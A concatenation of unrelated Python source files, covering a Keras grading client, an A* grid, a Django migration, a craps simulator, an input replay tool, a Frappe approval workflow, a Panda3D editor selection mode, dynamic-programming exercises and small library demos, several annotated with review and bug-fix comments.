        predictions, ...ConnectionFailedException on transport errors and
        ...BadResponseException on any non-200 / malformed reply.
        """
        log.debug(
            f"Submitting {len(predictions)} predictions to the provider for grading"
        )
        headers = {"content-type": "application/json"}
        if not len(predictions) > 0:
            raise KerasLTISubmissionInvalidSubmissionException(predictions)
        try:
            r = requests.post(
                self.submission_api_endpoint,
                data=json.dumps(
                    dict(
                        predictions=predictions,
                        user_token=self.user_token,
                        assignment_id=assignment_id,
                    )
                ),
                headers=headers,
            )
            rr = r.json()
        except Exception as e:
            log.error(e)
            raise KerasLTISubmissionConnectionFailedException(
                self.submission_api_endpoint, e
            ) from None
        try:
            assert r.status_code == 200 and rr.get("error") is None
            log.debug(
                f"Sent {len(predictions)} predictions to the provider for grading"
            )
            log.info(f"Successfully submitted assignment {assignment_id} for grading")
            return (
                round(rr.get("accuracy"), ndigits=2),
                round(rr.get("grade"), ndigits=2),
            )
        except (AssertionError, KeyError, ValueError, TypeError):
            raise KerasLTISubmissionBadResponseException(
                api_endpoint=self.submission_api_endpoint,
                return_code=r.status_code,
                assignment_id=assignment_id,
                message=rr.get("error"),
            )
    @classmethod
    def perform_reshape(
        cls,
        model: "ModelType",
        input_matrix: np.ndarray,
        reshape: typing.Optional[bool] = True,
    ) -> np.ndarray:
        """Reshape input_matrix to the model's input shape if they disagree.

        With reshape=False a mismatch raises KerasLTISubmissionInputException
        instead of attempting the reshape.
        NOTE(review): when the shapes already match, nothing is returned
        (implicit None) — confirm callers handle that case.
        """
        input_shape = input_matrix.shape
        # Keras input shapes carry None for the batch dimension.
        expected_input_shape = (None, *input_shape[1:])
        if model.input_shape != expected_input_shape:
            output_shape_mismatch = f"Input shape mismatch: Got {model.input_shape} but expected {expected_input_shape}"
            if reshape is not True:
                raise KerasLTISubmissionInputException(output_shape_mismatch)
            # Try to reshape
            log.warning(output_shape_mismatch)
            return input_matrix.reshape(cls.safe_shape(model.input_shape))
    @classmethod
    def safe_shape(
        cls, shape: typing.Tuple[typing.Optional[typing.Any], ...]
    ) -> typing.Tuple[int, ...]:
        """Replace falsy dims (e.g. the None batch dim) with -1 for reshape."""
        escaped = []
        for dim in shape:
            escaped.append(-1 if not dim else dim)
        return tuple(escaped)
    def submit(
        self,
        s: typing.Union["Submission", typing.List["Submission"]],
        verbose: bool = True,
        strict: bool = False,
        reshape: bool = False,
        expected_output_shape: typing.Optional[
            typing.Tuple[typing.Optional[typing.Any], ...]
        ] = None,
    ) -> typing.Dict[str, typing.Dict[str, float]]:
        """Grade one or more submissions; return {assignment_id: {accuracy, grade}}.

        In verbose mode (with a known validation-set size) inputs are
        predicted one at a time behind a progress bar; otherwise all inputs
        are collected and predicted in a single batch.
        """
        results = dict()
        if isinstance(s, list):
            submissions = s
        else:
            submissions = [s]
        for sub in submissions:
            if (
                strict
                and expected_output_shape
                and not sub.model.output_shape == expected_output_shape
            ):
                raise KerasLTISubmissionInputException(
                    f"Model has invalid output shape: Got {sub.model.output_shape} but expected {expected_output_shape}"
                )
            # Get assignment inputs and propagate errors
            validation_set_size = self.get_validation_set_size(sub.assignment_id)
            assignment_loader = loader.PartialLoader(
                sub.assignment_id, self.input_api_endpoint
            )
            if assignment_loader.is_empty():
                raise KerasLTISubmissionNoInputException(
                    self.input_api_endpoint, sub.assignment_id
                )
            predictions: PredictionsType = dict()
            if not verbose or validation_set_size is None:
                # Collect all input matrices
                collected: "InputsType" = []
                while True:
                    if (
                        validation_set_size is not None
                        and len(collected) >= validation_set_size
                    ):
                        break
                    loaded_input = assignment_loader.load_next()
                    if loaded_input is None:
                        break
                    collected.append(loaded_input)
                # Single batched prediction over all collected inputs.
                net_out = sub.model.predict(
                    np.array([np.asarray(c.get("matrix")) for c in collected])
                )
                predictions = {
                    str(c.get("hash")): int(np.argmax(pred))
                    for c, pred in zip(collected, net_out)
                }
            else:
                errors: typing.List[Exception] = []
                for i in progressbar.progressbar(
                    range(validation_set_size), redirect_stdout=True
                ):
                    loaded_input = assignment_loader.load_next()
                    if loaded_input is None:
                        raise KerasLTISubmissionInputException(f"Missing input {i}")
                    try:
                        input_matrix = loaded_input.get("matrix")
                        input_hash = loaded_input.get("hash")
                        # Predict one input at a time (adds the batch dim).
                        probabilities = sub.model.predict(
                            np.expand_dims(np.asarray(input_matrix), axis=0)
                        )
                        prediction = np.argmax(probabilities)
                        if input_hash:
                            predictions[input_hash] = int(prediction)
                    except Exception as e:
                        # NOTE(review): 'raise e' makes the error-collection
                        # below (and the errors check after the loop)
                        # unreachable — looks like a debugging leftover;
                        # confirm whether errors should be collected instead.
                        raise e
                        if e not in errors:
                            errors.append(e)
                if len(errors) > 0:
                    raise KerasLTISubmissionException()
            accuracy, grade = self.guess(sub.assignment_id, predictions)
            results[str(sub.assignment_id)] = dict(accuracy=accuracy, grade=grade)
        return results
|
#!/usr/bin/env python
from array import *
import random
class Cell():
    """One grid square: A* costs (f, g, h), coordinates and a display label."""

    def __init__(self, f, g, h, x=0, y=0, label=""):
        self.x, self.y = x, y
        self.f, self.g, self.h = f, g, h
        self.label = label

    def __str__(self):
        fields = (self.x, self.y, self.f, self.g, self.h, self.label)
        return "[%d,%d], f: %d, g: %d, h: %d, label: %s" % fields
class Grid():
    """A col x row matrix of Cell objects for A*-style grid searches."""
    def __init__(self, col, row, init=0):
        self.col = col
        self.row = row
        self.init = init
        # NOTE(review): Cell(0,0,0,y,x) stores the outer index as Cell.x and
        # the inner index as Cell.y — confirm this orientation is intended.
        self.matrix = [[Cell(0, 0, 0, y, x) for x in range(row)] for y in range(col)]
    def setlabel(self, x, y, label):
        """Attach a text label (e.g. "S", "E", "#") to cell [x][y]."""
        print(F"Setting [{x},{y}] label {label}")
        self.matrix[x][y].label = label
        print(F"Cell: {self.matrix[x][y]}")
    def print(self):
        """Render the grid; labelled cells show the label, others show g+h."""
        print(F"Dim: {self.col}, {self.row}")
        for i in range(0, self.col):
            row_str = ""
            for j in range(0, self.row):
                cell = self.matrix[i][j]
                label = str(cell.label)
                if label != "":
                    row_str += "|" + label
                else:
                    val = cell.g + cell.h
                    row_str += "|" + str(val)
                # BUG FIX: close the row using self.row; the old code read a
                # global 'r' that only exists in the __main__ block (NameError
                # anywhere else).
                if j == self.row - 1:
                    row_str += "|"
            print(F"{row_str}")
if __name__ == '__main__':
    print("Hello")
    # Build a 10x10 grid ('c'/'r' stay global — Grid.print reads 'r').
    c, r = 10, 10
    grid = Grid(c, r)
    grid.print()
    # Scatter a random handful of obstacle cells, then mark start and end.
    obstacle_count = random.randint(5, 9)
    for _ in range(obstacle_count):
        grid.setlabel(random.randint(0, 9), random.randint(0, 9), "#")
    grid.setlabel(0, 3, "S")
    grid.setlabel(9, 7, "E")
    grid.print()
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Adds a custom model-level permission on 'query' that gates downloading
    # larger numbers of result documents.
    dependencies = [
        ('query', '0013_term'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='query',
            options={'permissions': (('download_many_documents', 'Can download larger numbers of results'),)},
        ),
    ]
|
# -*- encoding: utf-8 -*-
from home import *
|
import math
import sys
import statistics
from crapsGame import CrapsGame
from math import log10, floor
# CLI: starting bankroll, number of simulated sessions, debug flag ("True").
money = int(sys.argv[1])
iterations = int(sys.argv[2])
debug = bool(sys.argv[3] == 'True')
# Debug mode runs a single fixed (return, minimum) combination.
if (debug == True):
    returns = [money*1.5]
    minimums = [10]
else:
    #returns = [int(money * 1.2), int(money * 1.5), int(money * 1.7), money * 2]
    returns = [int(money * 1.5)]
    #minimums = [5, 10, 15, 25]
    minimums = [5]
# Three report files: overall results, bankroll low-water and high-water marks.
resultFile = open('results.txt', 'w')
lowFile = open('low.txt', 'w')
highFile = open('high.txt', 'w')
resultFile.write("Start: ${}, Iterations: {}\n\n".format(sys.argv[1], sys.argv[2]))
lowFile.write("Start: ${}, Iterations: {}\n\n".format(sys.argv[1], sys.argv[2]))
highFile.write("Start: ${}, Iterations: {}\n\n".format(sys.argv[1], sys.argv[2]))
# Fixed-width column templates for the report tables.
probTemplate = "{0:^20}|{1:^20}|{2:^20}|{3:^20}|{4:^20}|{5:^20}|{6:^20}|{7:^20}"
resultTemplate = "{0:^15}|{1:^15}|{2:^15}|{3:^15}|{4:^15}"
resultFile.write(resultTemplate.format("MINIMUM", "RETURN", "SUCCESS", "AVG ROLLS", "AVG POINTS"))
lowFile.write(probTemplate.format("RETURN", "MEDIAN LOW (WIN)", "MEDIAN LOW (ALL)", "MEAN LOW (WIN)", "MEAN LOW (ALL)", "STDDEV LOW (WIN)", "STDDEV LOW (ALL)", "MIN LOW (WIN)"))
highFile.write(probTemplate.format("RETURN", "MEDIAN HIGH (LOSE)", "MEDIAN HIGH (ALL)", "MEAN HIGH (LOSE)", "MEAN HIGH (ALL)", "STDDEV HIGH (LOSE)", "STDDEV HIGH (ALL)", "MAX HIGH (LOSE)"))
resultFile.write("\n");
lowFile.write("\n");
highFile.write("\n");
resultFile.write("-------------------------------------------------------------------------------\n");
highFile.write("----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n");
lowFile.write("----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n");
# Sweep every (target return, table minimum) combination and simulate
# 'iterations' craps sessions for each, tracking win rate plus bankroll
# high/low water marks for winning and losing sessions.
for desiredReturn in returns:
    for minBet in minimums:
        success = 0
        totalRolls = 0
        totalPoints = 0
        allLows = []
        winLows = []
        allHighs = []
        loseHighs = []
        for iteration in range(0, iterations):
            game = CrapsGame(int(sys.argv[1]), minBet, False, False, debug)
            #don't terminate until all money off table
            # Play rounds until broke or the target return is reached.
            while (game.getMoney() >= minBet and game.getAvailableMoney() < desiredReturn):
                game.startRound()
                #bet
                if (game.isOn() == False):
                    game.betPass(1)
                    if(game.getCameLastRoll() == True and game.getNumBetsOnTable() < 3 and game.getMoney() < desiredReturn):
                        # Odds multiple scales with how likely the come point is.
                        if (game.getLastCome() == 6 or game.getLastCome() == 8):
                            multiple = 3
                        elif (game.getLastCome() == 5 or game.getLastCome() == 9):
                            multiple = 2
                        else: #point == 4 or point == 10
                            multiple = 1
                        game.betComeOdds(game.getLastCome(), multiple)
                else:
                    if(game.getCameLastRoll() == True):
                        if (game.getLastCome() == 6 or game.getLastCome() == 8):
                            multiple = 2
                        elif (game.getLastCome() == 5 or game.getLastCome() == 9):
                            multiple = 2
                        else: #point == 4 or point == 10
                            multiple = 2
                        game.betComeOdds(game.getLastCome(), multiple)
                    if (game.getLastRollComeOut() == True):
                        # NOTE(review): this local is assigned but never read.
                        lastRollComeOut = False
                        if (game.getPoint() == 6 or game.getPoint() == 8):
                            multiple = 2
                        elif (game.getPoint() == 5 or game.getPoint() == 9):
                            multiple = 2
                        else: #point == 4 or point == 10
                            multiple = 2
                        game.betPassOdds(multiple)
                        if (game.getNumBetsOnTable() < 3 and game.getMoney() < desiredReturn):
                            game.betCome(1)
                    elif (game.getNumBetsOnTable() < 3 and game.getMoney() < desiredReturn):
                        if (game.getNumBetsOnTable() == 1):
                            game.betCome(1)
                        elif (game.sixAndEightNotTaken() == True):
                            game.betCome(1)
                            #game.betPlace(6, 1)
                            #game.betPlace(8, 1)
                        else:
                            game.betCome(1)
                #roll
                rollValue = game.roll()
                #update earnings
                game.updateEarnings(rollValue)
            totalRolls = totalRolls + game.getNumRolls()
            totalPoints = totalPoints + game.getNumPoints()
            # A session is a success if it reached the desired return.
            if (game.getAvailableMoney() >= desiredReturn):
                winLows.insert(success, game.getLow())
                success = success + 1
            else:
                loseHighs.insert(iteration-success, game.getHigh())
            allHighs.insert(iteration, game.getHigh())
            allLows.insert(iteration, game.getLow())
        # Aggregate statistics over all sessions for this configuration.
        successRate = success/iterations * 100
        roundedSuccessRate = round(successRate, -int(math.floor(math.log10(abs(successRate))) - (4)))
        meanRolls = int(totalRolls/iterations)
        meanPoints = int(totalPoints/iterations)
        meanWinLow = int(statistics.mean(winLows))
        medianWinLow = int(statistics.median(winLows))
        stddevWinLow = int(statistics.stdev(winLows))
        meanAllLow = int(statistics.mean(allLows))
        medianAllLow = int(statistics.median(allLows))
        stddevAllLow = int(statistics.stdev(allLows))
        meanLoseHigh = int(statistics.mean(loseHighs))
        medianLoseHigh = int(statistics.median(loseHighs))
        stddevLoseHigh = int(statistics.stdev(loseHighs))
        meanAllHigh = int(statistics.mean(allHighs))
        medianAllHigh = int(statistics.median(allHighs))
        stddevAllHigh = int(statistics.stdev(allHighs))
        minLow = int(min(winLows))
        maxHigh = int(max(loseHighs))
        # Append one row per configuration to each report file.
        resultFile.write(resultTemplate.format("${}".format(minBet), "${}".format(desiredReturn), "{}%".format(roundedSuccessRate), "{}".format(meanRolls), "{}".format(meanPoints)));
        resultFile.write("\n")
        lowFile.write(probTemplate.format("${}".format(desiredReturn), "${}".format(medianWinLow), "${}".format(medianAllLow), "${}".format(meanWinLow), "${}".format(meanAllLow), "${}".format(stddevWinLow), "${}".format(stddevAllLow), "${}".format(minLow)))
        lowFile.write("\n")
        highFile.write(probTemplate.format("${}".format(desiredReturn), "${}".format(medianLoseHigh), "${}".format(medianAllHigh), "${}".format(meanLoseHigh), "${}".format(meanAllHigh), "${}".format(stddevLoseHigh), "${}".format(stddevAllHigh), "${}".format(maxHigh)))
        highFile.write("\n")
resultFile.close()
lowFile.close()
highFile.close()
|
# player.py contains functions to assist in repeating mouse/keyboard
# events as read from a file.
# * see sample_annotated.txt for file formatting details
from pynput import mouse
from pynput import keyboard
from pynput.mouse import Button
from pynput.keyboard import Key
from time import sleep
class Player:
    """Replays mouse/keyboard events recorded in a text file.

    See sample_annotated.txt for the file format: one event per line,
    space-separated, first token is the command name.
    """
    mouse_ctrl = mouse.Controller()
    keyboard_ctrl = keyboard.Controller()

    # file_to_list(filename) returns a list based on the file, filename:
    # * each item is a tuple representing an input event
    def file_to_list(self, filename):
        """Parse filename into a list of event tuples, one per line."""
        # BUG FIX: use a context manager so the file handle is always closed
        # (the previous version leaked it).
        with open(filename, 'r') as file:
            lines = file.readlines()
        return [tuple(line.rstrip().split(" ")) for line in lines]

    # play(filename) repeats the mouse/keyboard events occuring
    # in the file, filename
    def play(self, filename):
        """Replay the mouse/keyboard events recorded in filename."""
        lines = Player.file_to_list(self, filename)

        def move(x, y):
            Player.mouse_ctrl.position = (int(x), int(y))

        # SECURITY NOTE: eval() below executes text taken from the input
        # file (e.g. "Button.left", "Key.enter"); only play files from
        # trusted sources.
        for line in lines:
            cmd = line[0]
            if cmd == 'mMove':
                move(line[1], line[2])
            elif cmd == 'Wait':
                sleep(float(line[1]))
            elif cmd == 'mPress':
                move(line[1], line[2])
                Player.mouse_ctrl.press(eval(line[3]))
            elif cmd == 'mRelease':
                move(line[1], line[2])
                Player.mouse_ctrl.release(eval(line[3]))
            elif cmd == 'Scroll':
                move(line[1], line[2])
                Player.mouse_ctrl.scroll(int(line[3]), int(line[4]))
            elif cmd == 'kPress':
                if len(line[1]) == 1:
                    Player.keyboard_ctrl.press(line[1])
                else:
                    Player.keyboard_ctrl.press(eval(line[1]))
            elif cmd == 'kRelease':
                if len(line[1]) == 1:
                    Player.keyboard_ctrl.release(line[1])
                else:
                    Player.keyboard_ctrl.release(eval(line[1]))
            else:
                raise ValueError('File has invalid formatting')
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015, Indictrans and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
from mycfo.mycfo_utils import get_central_delivery
class TrainingSubscriptionApproval(Document):
	"""Approval workflow for a training subscription request.

	On submit, central delivery must have accepted or rejected the request;
	the matching handler updates the status, (on accept) creates an Answer
	Sheet, and notifies the relevant users by e-mail.
	"""
	def validate(self):
		pass
	def before_submit(self):
		# Both checks must pass before the document reaches submitted state.
		self.validate_for_central_delivery_status()
		self.initiate_for_request_submission()
	def validate_for_central_delivery_status(self):
		"""Block submission until central delivery has recorded a decision."""
		if not self.central_delivery_status:
			frappe.throw("Central delivery Status is mandatory to submit training request.")
	def initiate_for_request_submission(self):
		"""Dispatch to the accept/reject handler matching the decision."""
		mapper = {"Accepted":self.accept_request, "Rejected":self.reject_request}
		mapper.get(self.central_delivery_status)()
	def accept_request(self):
		"""Mark accepted, create the answer sheet and notify the recipients."""
		self.request_status = "Accepted"
		# Forced trainings notify the requester; unforced ones go to central delivery.
		request_type_dict = {"Forced Training":["/templates/training_templates/assigned_training_notification.html", [ frappe.db.get_value("User", {"name":self.training_requester}, "email") ] ],
							"Unforced Training":["/templates/training_templates/training_request_notification.html", get_central_delivery() ]
							}
		template = request_type_dict.get(self.request_type)[0]
		recipients = request_type_dict.get(self.request_type)[1]
		self.create_answer_sheet()
		self.send_mail(template, recipients)
	def create_answer_sheet(self):
		"""Create a new Answer Sheet pre-filled from the linked assessment."""
		as_data = frappe.get_doc("Assessment", {"name":self.assessment})
		new_as_data = self.get_assessment_dict(as_data)
		ans_key = frappe.new_doc("Answer Sheet")
		ans_key.answer_sheet_status = "New"
		ans_key.student_name = self.training_requester
		ans_key.training_subscription = self.name
		ans_key.update(new_as_data)
		ans_key.save(ignore_permissions=1)
	def get_assessment_dict(self, as_data):
		"""Project the Assessment fields that seed the answer sheet."""
		return {
			"total_questions":as_data.get("total_questions"),
			"total_marks":as_data.get("total_marks"),
			"table_5":as_data.get("table_5"),
			"training_name":as_data.get("training_name"),
			"assessment_evaluator":as_data.get("assessment_evaluator"),
			"subjective_flag":as_data.get("subjective_flag")
		}
	def reject_request(self):
		"""Mark rejected and notify the requester."""
		self.request_status = "Rejected"
		template = "/templates/training_templates/training_request_notification.html"
		# BUG FIX: send_mail() requires a recipients argument; calling it with
		# only the template raised TypeError, so rejection mails never went
		# out.  Notify the requester (mirrors the Forced Training path above).
		recipients = [frappe.db.get_value("User", {"name": self.training_requester}, "email")]
		self.send_mail(template, recipients)
	def send_mail(self, template, recipients):
		"""Render the template with request context and mail it to recipients."""
		subject = "Training Document Notification"
		first_nm, last_nm = frappe.db.get_value("User", {"name":self.training_requester}, ["first_name", "last_name"])
		args = {"training_name":self.training_name, "cd":frappe.session.user, "first_name":first_nm,
				"last_name":last_nm if last_nm else "", "comments":self.central_delivery_comments, "status":self.request_status }
		frappe.sendmail(recipients= recipients, sender=None, subject=subject,
				message=frappe.get_template(template).render(args))
|
from panda3d.core import CollisionBox, CollisionNode, BitMask32, CollisionHandlerQueue, TransformState, BitMask32
from bsp.leveleditor.DocObject import DocObject
from .SelectionType import SelectionType, SelectionModeTransform
from bsp.leveleditor.menu.KeyBind import KeyBind
from bsp.leveleditor.math.Line import Line
from bsp.leveleditor.actions.Select import Select, Deselect
from bsp.leveleditor import LEUtils, LEGlobals
class SelectionMode(DocObject):
    """Base class for an editor selection mode.

    Subclasses define what kind of objects can be picked (collision mask and
    python-tag key), which transforms apply, and whether the selection can be
    deleted/duplicated. This base implements mouse picking, box selection,
    selection cycling, and (de)activation bookkeeping.
    """

    Type = SelectionType.Nothing
    # Collision mask used for the mouse click ray
    Mask = 0
    # The key to locate the object from what we clicked on
    Key = None
    # Can we delete the selected objects?
    CanDelete = True
    # Can we clone/duplicate the selected objects?
    CanDuplicate = True
    # What kinds of transform can we apply?
    TransformBits = SelectionModeTransform.All
    ToolOnly = True

    def __init__(self, mgr):
        DocObject.__init__(self, mgr.doc)
        self.mgr = mgr
        self.enabled = False
        self.activated = False
        self.properties = None
        self.entryIdx = 0
        self.lastEntries = None

    def toggleSelect(self, theObj, appendSelect):
        """Select/deselect the given object (or list of objects)."""
        if isinstance(theObj, list):
            obj = theObj[0]
            objs = theObj
        else:
            obj = theObj
            objs = [obj]

        selection = []
        anyAlreadySelected = False
        for o in objs:
            # Fix: test each object in turn; the old code tested the first
            # object (`obj`) on every iteration.
            if not self.mgr.isSelected(o):
                selection.append(o)
            else:
                anyAlreadySelected = True

        if not appendSelect:
            if len(selection) > 0:
                base.actionMgr.performAction("Select %s" % obj.getName(), Select(selection, True))
        else:
            # In multi-select (shift held), if the object we clicked on has
            # already been selected, deselect it.
            if anyAlreadySelected:
                base.actionMgr.performAction("Deselect %s" % obj.getName(), Deselect(objs))
            elif len(selection) > 0:
                base.actionMgr.performAction("Append select %s" % obj.getName(), Select(selection, False))

    def getActualObject(self, obj, entry):
        # Hook for subclasses to translate a picked object (e.g. to a face
        # or sub-component); identity by default.
        return obj

    def getObjectsUnderMouse(self):
        """Return [(object, collisionEntry), ...] under the cursor, nearest first."""
        vp = base.viewportMgr.activeViewport
        if not vp:
            return []

        entries = vp.click(self.Mask)
        if not entries or len(entries) == 0:
            return []

        objects = []
        key = self.Key
        for i in range(len(entries)):
            # Our entries have been sorted by distance, so use the first (closest) one.
            entry = entries[i]
            np = entry.getIntoNodePath().findNetPythonTag(key)
            if not np.isEmpty():
                # Don't backface cull if there is a billboard effect on or above this node
                if entry.hasSurfaceNormal() and not LEUtils.hasNetBillboard(entry.getIntoNodePath()):
                    surfNorm = entry.getSurfaceNormal(vp.cam).normalized()
                    rayDir = entry.getFrom().getDirection().normalized()
                    if surfNorm.dot(rayDir) >= 0:
                        # Backface cull
                        continue

                obj = np.getPythonTag(key)
                actual = self.getActualObject(obj, entry)
                objects.append((actual, entry))

        return objects

    def cycleNextSelection(self, appendSelect = False):
        # Fix: lastEntries may be None (initial state / after deselectAll);
        # the old `len(...) == 0` check crashed with a TypeError.
        if not self.lastEntries:
            return
        self.entryIdx = (self.entryIdx + 1) % len(self.lastEntries)
        self.toggleSelect(self.lastEntries[self.entryIdx][0], appendSelect)

    def cyclePreviousSelection(self, appendSelect = False):
        # Fix: same None guard as cycleNextSelection.
        if not self.lastEntries:
            return
        self.entryIdx = (self.entryIdx - 1) % len(self.lastEntries)
        self.toggleSelect(self.lastEntries[self.entryIdx][0], appendSelect)

    def selectObjectUnderMouse(self, appendSelect = False):
        """Pick under the cursor, select the closest hit, and return it (or None)."""
        objects = self.getObjectsUnderMouse()
        self.lastEntries = objects
        self.entryIdx = 0
        if len(objects) > 0:
            self.toggleSelect(objects[0][0], appendSelect)
            return objects[0][0]
        return None

    def getObjectsInBox(self, mins, maxs):
        """Return [(object, collisionEntry), ...] intersecting the world-space box."""
        objects = []
        # Create a one-off collision box, traverser, and queue to test against all MapObjects
        box = CollisionBox(mins, maxs)
        node = CollisionNode("selectToolCollBox")
        node.addSolid(box)
        node.setFromCollideMask(self.Mask)
        node.setIntoCollideMask(BitMask32.allOff())
        boxNp = self.doc.render.attachNewNode(node)
        queue = CollisionHandlerQueue()
        base.clickTraverse(boxNp, queue)
        queue.sortEntries()
        key = self.Key
        entries = queue.getEntries()
        # Select every MapObject our box intersected with
        for entry in entries:
            np = entry.getIntoNodePath().findNetPythonTag(key)
            if not np.isEmpty():
                obj = np.getPythonTag(key)
                actual = self.getActualObject(obj, entry)
                if isinstance(actual, list):
                    # De-duplicate: only add objects not already collected.
                    for a in actual:
                        if not any(a == x[0] for x in objects):
                            objects.append((a, entry))
                else:
                    objects.append((actual, entry))
        boxNp.removeNode()
        return objects

    def selectObjectsInBox(self, mins, maxs):
        objects = self.getObjectsInBox(mins, maxs)
        if len(objects) > 0:
            base.actionMgr.performAction("Select %i objects" % len(objects), Select([x[0] for x in objects], True))

    def deselectAll(self):
        self.lastEntries = None
        self.entryIdx = 0
        if base.selectionMgr.hasSelectedObjects():
            base.actionMgr.performAction("Deselect all", Deselect(all = True))

    def deleteSelectedObjects(self):
        base.selectionMgr.deleteSelectedObjects()

    def cleanup(self):
        self.mgr = None
        self.enabled = None
        # Fix: was `self.activatated` (typo) — it created a junk attribute
        # and left the real `activated` flag set.
        self.activated = None
        self.properties = None
        self.lastEntries = None
        self.entryIdx = None
        DocObject.cleanup(self)

    def enable(self):
        self.enabled = True
        self.activate()

    def activate(self):
        self.activated = True
        if not self.ToolOnly:
            self.__activate()

    def disable(self):
        self.enabled = False
        self.toolDeactivate()
        self.deactivate()

    def deactivate(self, docChange = False):
        if not self.ToolOnly:
            self.__deactivate()

    def toolActivate(self):
        if self.ToolOnly:
            self.__activate()

    def toolDeactivate(self):
        if self.ToolOnly:
            self.__deactivate()

    def __activate(self):
        # Hook up keybinds/properties when this mode becomes live.
        if self.CanDelete:
            base.menuMgr.connect(KeyBind.Delete, self.deleteSelectedObjects)
        self.updateModeActions()
        if self.properties and self.doc.toolMgr:
            base.toolMgr.toolProperties.addGroup(self.properties)
            self.properties.updateForSelection()
        self.accept('selectionsChanged', self.onSelectionsChanged)

    def __deactivate(self):
        if self.CanDelete:
            base.menuMgr.disconnect(KeyBind.Delete, self.deleteSelectedObjects)
        self.activated = False
        self.lastEntries = None
        self.entryIdx = 0
        if self.properties and self.doc.toolMgr:
            base.toolMgr.toolProperties.removeGroup(self.properties)
        self.ignoreAll()

    def updateModeActions(self):
        # Delete is only actionable when something is selected.
        if self.CanDelete:
            if len(self.mgr.selectedObjects) == 0:
                base.menuMgr.disableAction(KeyBind.Delete)
            else:
                base.menuMgr.enableAction(KeyBind.Delete)

    def onSelectionsChanged(self):
        self.updateModeActions()
        if self.properties:
            self.properties.updateForSelection()

    def getProperties(self):
        return self.properties

    # Returns a list of objects that will be selected
    # when switching to this mode from prevMode.
    def getTranslatedSelections(self, prevMode):
        return []
|
# -*- coding: utf-8 -*-
import tensorflow as tf
# Define a simple computation graph performing vector addition.
input1 = tf.constant([1.0,2.0,3.0],name="input1")
input2 = tf.Variable(tf.random_uniform([3]),name="input2")
output = tf.add_n([input1,input2],name="add")
# writer = tf.train.SummaryWriter("/path/to/log",tf.get_default_graph())
# Export the default graph for TensorBoard visualization.
writer = tf.summary.FileWriter("/temp/to/log",tf.get_default_graph())
writer.close()
|
def howSum(targetSum, numbers):
    """Return a list of values from *numbers* (repetition allowed) summing to
    *targetSum*, or None when no such combination exists. Naive recursion."""
    if targetSum == 0:
        return []
    if targetSum < 0:
        return None
    for candidate in numbers:
        partial = howSum(targetSum - candidate, numbers)
        if partial is not None:
            partial.append(candidate)
            return partial
    return None
# Demo runs for the naive recursive version.
print(howSum(7, [2,3]))
print(howSum(7, [5,3,4,7]))
print(howSum(7, [2,4]))
'''The above method doesnt work for larger array or if the targetSum is very large'''
'''m = targetSum, n = numbers length
Time Complexity: O(n^m * m)
the extra m in TC is because of the appending
Space complexity: O(m)'''
#Method 2 - Memoization
def howSum2(targetSum, numbers, memo=None):
    """Memoized howSum: return a list of values from *numbers* summing to
    *targetSum*, or None when impossible.

    Fix: the previous version appended to the list object fetched from the
    memo, mutating cached entries shared between branches (and corrupting any
    caller-supplied ``memo`` dict). Build a fresh list instead of mutating.
    """
    if memo is None:
        memo = {}
    if targetSum in memo:
        return memo[targetSum]
    if targetSum == 0:
        return []
    if targetSum < 0:
        return None
    for num in numbers:
        remainderResult = howSum2(targetSum - num, numbers, memo)
        if remainderResult is not None:
            # Fresh list — never alias/mutate what is stored in the memo.
            memo[targetSum] = remainderResult + [num]
            return memo[targetSum]
    memo[targetSum] = None
    return None
# Demo runs for the memoized version.
print(howSum2(7, [2,3]))
print(howSum2(7, [5,3,4,7]))
print(howSum2(7, [2,4]))
print(howSum2(8, [2,3,5]))
#print(howSum2(300, [14,7,10,2]))
"""Time complexity: O(n * m^2)
Space complexity: O(m * m) = O(m^2)"""
# Tabulation method
def howSumt(targetSum, numbers):
    """Bottom-up table variant: table[i] holds one combination summing to i
    (None when i is unreachable); the answer is table[targetSum]."""
    table = [None] * (targetSum + 1)
    table[0] = []
    for total in range(targetSum + 1):
        if table[total] is None:
            continue
        for num in numbers:
            # Extend every reachable total by each candidate, staying in range.
            if total + num <= targetSum:
                table[total + num] = table[total] + [num]
    return table[targetSum]
print(howSumt(7, [5,3,4]))
# NOTE(review): the next two calls use howSum2 even though this section is
# labelled "Tabulation" — possibly a copy-paste slip; confirm whether howSumt
# was intended here.
print(howSum2(7, [2,4]))
print(howSum2(300, [14,7,10,2]))
'''
Time Complexity: O(m^2 * n)
Space Complexity: O(m^2)
'''
|
from csslib import css
# Python 2 demo script: parse a tiny stylesheet (variable + comment) and
# exercise csslib's query helpers.
CSS = css.CSS3("$favcol:purple;/* comment */body{background-color:$favcol;}") # input as string
CSS.parse() # parses string
# __help__ for help
print CSS.get("__comments__") # gets the comments of the css
print CSS.get("__tree__") # gets complete tree
print CSS.get("__vars__") # gets the variables of the css
print CSS.getItem("body") # gets an item with the name
# CSS.getIds() gets all ids
# CSS.getClasses gets all classes
# CSS.getAllStartWith(<startswith>) gets all items that start with <startswith>
|
import os
import sys
import holoviews as hv
import pandas as pd
from rubicon_ml import Rubicon
from rubicon_ml.exceptions import RubiconException
def get_or_create_project(rubicon, name):
    """Create the named project, or fetch it when it already exists."""
    try:
        return rubicon.create_project(name)
    except RubiconException:
        # Creation fails when the project exists — fall back to a lookup.
        return rubicon.get_project(name)
def log_rubicon(path):
    """Populate a filesystem-backed rubicon project with sample experiments,
    features, parameters, metrics, a dataframe, and artifacts for testing.

    No-op when the project directory already exists under *path*.
    """
    project_name = "intake-rubicon unit testing"
    # Idempotence guard: skip regeneration if the project was already written.
    if os.path.exists(os.path.join(path, "projects", project_name)):
        return

    rubicon = Rubicon(persistence="filesystem", root_dir=path)
    project = get_or_create_project(rubicon, project_name)

    experiment_a = project.log_experiment(name="experiment_a", tags=["model-a", "y"])
    experiment_a.log_feature("year")
    experiment_a.log_feature("credit score")

    experiment_b = project.log_experiment(name="experiment_b", tags=["model-b", "y"])
    experiment_b.log_feature("year")
    experiment_b.log_feature("credit score")

    experiment_a.log_parameter("random state", 13243546)
    experiment_a.log_parameter("test size", "10 GB")
    experiment_a.log_parameter("n_estimators", 20)

    experiment_a.log_metric("Accuracy", "99")
    experiment_a.log_metric("AUC", "0.825")

